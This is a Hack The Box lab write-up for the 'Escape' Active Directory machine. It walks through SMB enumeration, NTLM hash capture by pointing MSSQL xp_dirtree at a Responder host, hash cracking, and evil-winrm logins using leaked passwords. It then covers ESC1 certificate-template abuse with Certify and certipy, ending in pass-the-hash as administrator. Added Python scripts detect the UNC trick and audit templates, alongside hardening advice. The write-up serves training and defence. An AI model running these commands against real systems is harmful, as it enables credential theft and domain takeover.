Hack The Box – Escape (EN)


Hello, in this writeup I explain the solution of the Escape Hack The Box machine (an Active Directory machine).



USER

sudo nmap -sV 10.10.11.202

The domain name is sequel.htb. Add it to /etc/hosts.

Check SMB

smbclient -L //10.10.11.202 -U ''

There is a PDF file. Download it.

The PDF file contains the SQL Server procedures.

There is a username and password on the second page:

PublicUser:GuestUserCantWrite1

Let's check the MS SQL Server port using nmap:

sudo nmap -sSV sequel.htb -p1433

MS SQL is open. I looked around in the SQL server but found nothing. Then I read the HackTricks page (link).

According to HackTricks, it may be possible to steal the NTLM hash. Let's try it.

1- Run Responder (the SMB and HTTP servers are on):

sudo Responder -I tun0 -vwP

2- Connect to the SQL Server using impacket-mssqlclient:

impacket-mssqlclient sequel.htb/PublicUser@sequel.htb

3- Run the command below in the SQL Server session:

xp_dirtree '\\10.10.14.7\anan'
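The xp_dirtree call above works because the SQL Server service account tries to open the UNC path and authenticates to whichever host answers. The Python script below is an added example for this writeup, not code from the original post: it scans statement text of the kind a SQL Server audit or Extended Events session records and flags calls to xp_dirtree, xp_fileexist or xp_subdirs whose UNC path points at a host outside an allowlist. The log lines, their field layout and the allowlist are constructed for the example.

```python
import re
from dataclasses import dataclass

# Extended stored procedures that take a path and make the SQL Server service
# account open it; a UNC path makes the server authenticate outbound over SMB.
PATH_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# Matches e.g.  xp_dirtree '\\10.10.14.7\anan'  with either quote style.
CALL_RE = re.compile(
    r"\b(?P<proc>" + "|".join(PATH_PROCS) + r")\b\s*['\"](?P<path>\\\\[^'\"]+)['\"]",
    re.IGNORECASE,
)
# Pulls the host out of \\host\share\...
UNC_HOST_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\")


@dataclass
class Finding:
    line_no: int
    proc: str
    host: str
    statement: str


def find_outbound_unc_calls(log_lines, allowed_hosts):
    """Return one Finding per statement that calls a path-taking xp_* procedure
    with a UNC path whose host is not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for n, line in enumerate(log_lines, 1):
        for m in CALL_RE.finditer(line):
            h = UNC_HOST_RE.match(m.group("path"))
            if h is None:
                continue
            host = h.group("host").lower()
            if host not in allowed:
                findings.append(Finding(n, m.group("proc").lower(), host, m.group(0)))
    return findings


# Constructed sample lines (not real logs) in the shape an audit or
# sql_statement_completed event would give after flattening to text.
SAMPLE_LOG = [
    "2023-01-01 10:00:01 server_principal_name=PublicUser statement=SELECT name FROM sys.databases",
    "2023-01-01 10:00:05 server_principal_name=PublicUser statement=EXEC xp_dirtree '\\\\10.10.14.7\\anan'",
    "2023-01-01 10:00:09 server_principal_name=backupjob statement=EXEC xp_dirtree '\\\\fileserver.sequel.htb\\backups'",
    "2023-01-01 10:00:12 server_principal_name=PublicUser statement=EXEC xp_fileexist '\\\\10.10.14.7\\x\\y.txt'",
]

# Hosts the SQL Server is legitimately expected to reach over UNC (constructed).
ALLOWED_UNC_HOSTS = ["fileserver.sequel.htb"]

if __name__ == "__main__":
    for f in find_outbound_unc_calls(SAMPLE_LOG, ALLOWED_UNC_HOSTS):
        print(f"line {f.line_no}: {f.proc} -> {f.host}  ({f.statement})")
```

Running it flags the two statements aimed at 10.10.14.7 and ignores the backup job's call to the allowlisted file server. On the server side, revoking EXECUTE on these procedures from public (they are callable by every login in a default install) and blocking outbound SMB (TCP 445) from the SQL host removes the capture path regardless of which tool is listening.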

Responder captured the NTLMv2 hash of sql_svc. Let's crack it with hashcat:

hashcat sql_svc-hash /usr/share/wordlists/rockyou.txt


sql_svc:REGGIE1234ronnie

Log in as sql_svc using evil-winrm. There is no user.txt on the Desktop, though.

evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'

So I must become Ryan.Cooper to get user.txt.

When I reviewed the directories, I found the SQLServer directory and its Logs folder.

There is a password for Ryan.Cooper in the ERRORLOG.BAK file:

Ryan.Cooper:NuclearMosquito3

Now log in as Ryan.Cooper and read user.txt:

evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'



Privilege Escalation

Now, find a vulnerable certificate template that can be used to obtain a certificate for Administrator (certificate attacks).

First, upload Certify.exe to the machine and run the command below. Its purpose is to identify the certificate authority and any vulnerable template.

./certify.exe find /vulnerable

Certificate authority (CA): sequel-DC-CA

Template name: UserAuthentication

Based on this output, run Certipy on the attack machine to request a PFX certificate for administrator (Rubeus and similar tools also work):

certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -ca sequel-DC-CA -template UserAuthentication -upn administrator@sequel.htb

Then we can get a TGT and the NTLM hash of the administrator with it:

certipy auth -pfx administrator.pfx


administrator: aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Now log in as administrator with the hash and read root.txt:

evil-winrm -i 10.10.11.202 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
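Certify reported UserAuthentication as vulnerable because of the combination of template settings known as ESC1: the enrollee may supply the subject and SAN, the EKU permits client authentication, no manager approval or authorized signature is required, and a low-privileged group can enroll. The Python below is an added example written for this writeup, not the author's or Certify's code; it evaluates those five conditions over template attributes as they are stored in AD. The attribute values for UserAuthentication, a hardened copy of it and the default User template are constructed to illustrate the check and were not read from the box.

```python
from dataclasses import dataclass

# Bit in msPKI-Certificate-Name-Flag: the requester may put any subject / SAN
# in the CSR instead of the CA building it from the requester's AD object.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Certificate-Name-Flag: the CA fills the SAN UPN from AD itself.
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000
# Bit in msPKI-Enrollment-Flag: requests wait for a certificate manager's approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let a certificate authenticate a user to AD (PKINIT / Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Groups whose membership effectively means "any domain account".
LOW_PRIV_GROUPS = {"domain users", "authenticated users", "domain computers", "everyone"}


@dataclass
class Template:
    name: str
    name_flag: int           # msPKI-Certificate-Name-Flag
    enrollment_flag: int     # msPKI-Enrollment-Flag
    ekus: list               # pKIExtendedKeyUsage OIDs; [] means any purpose
    ra_signatures: int       # msPKI-RA-Signature
    enroll_principals: list  # principals holding the Enroll right
    enabled: bool = True     # published on at least one CA


def esc1_reasons(t):
    """Return the ESC1 conditions the template satisfies; all five together mean
    a low-privileged enrollee can request a logon certificate for any UPN."""
    reasons = []
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject/SAN")
    if not t.ekus or AUTH_EKUS & set(t.ekus):
        reasons.append("EKU allows client authentication")
    if not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval required")
    if t.ra_signatures == 0:
        reasons.append("no authorized signatures required")
    # Strip a DOMAIN\ prefix before comparing the group name.
    if any(p.split("\\")[-1].lower() in LOW_PRIV_GROUPS for p in t.enroll_principals):
        reasons.append("low-privileged principals can enroll")
    return reasons


def is_esc1(t):
    return t.enabled and len(esc1_reasons(t)) == 5


def audit(templates):
    """Map template name -> True if it meets every ESC1 condition."""
    return {t.name: is_esc1(t) for t in templates}


CLIENT_AUTH = ["1.3.6.1.5.5.7.3.2"]

# Constructed attribute values; only the template and CA names come from the box.
SAMPLE_TEMPLATES = [
    Template("UserAuthentication", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0,
             CLIENT_AUTH, 0, ["SEQUEL\\Domain Users"]),
    # Same template after the two usual fixes: CA-built UPN and manager approval.
    Template("UserAuthentication (hardened)", CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
             CT_FLAG_PEND_ALL_REQUESTS, CLIENT_AUTH, 0, ["SEQUEL\\Domain Users"]),
    # Default User template shape: enrollee cannot choose the subject.
    Template("User", CT_FLAG_SUBJECT_ALT_REQUIRE_UPN, 0,
             CLIENT_AUTH, 0, ["SEQUEL\\Domain Users"]),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(f"{t.name}: ESC1={is_esc1(t)}  reasons={esc1_reasons(t)}")
```

Only the first template meets all five conditions. Clearing ENROLLEE_SUPPLIES_SUBJECT alone breaks the chain, since the CA then builds the UPN from the requester's own account; requiring manager approval or restricting Enroll to a dedicated group does the same. For detection, CA audit events 4886 and 4887 record the requester and the subject/SAN of each request, so a request whose requester differs from the UPN in the SAN is the signal to alert on.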



Thanks for Reading

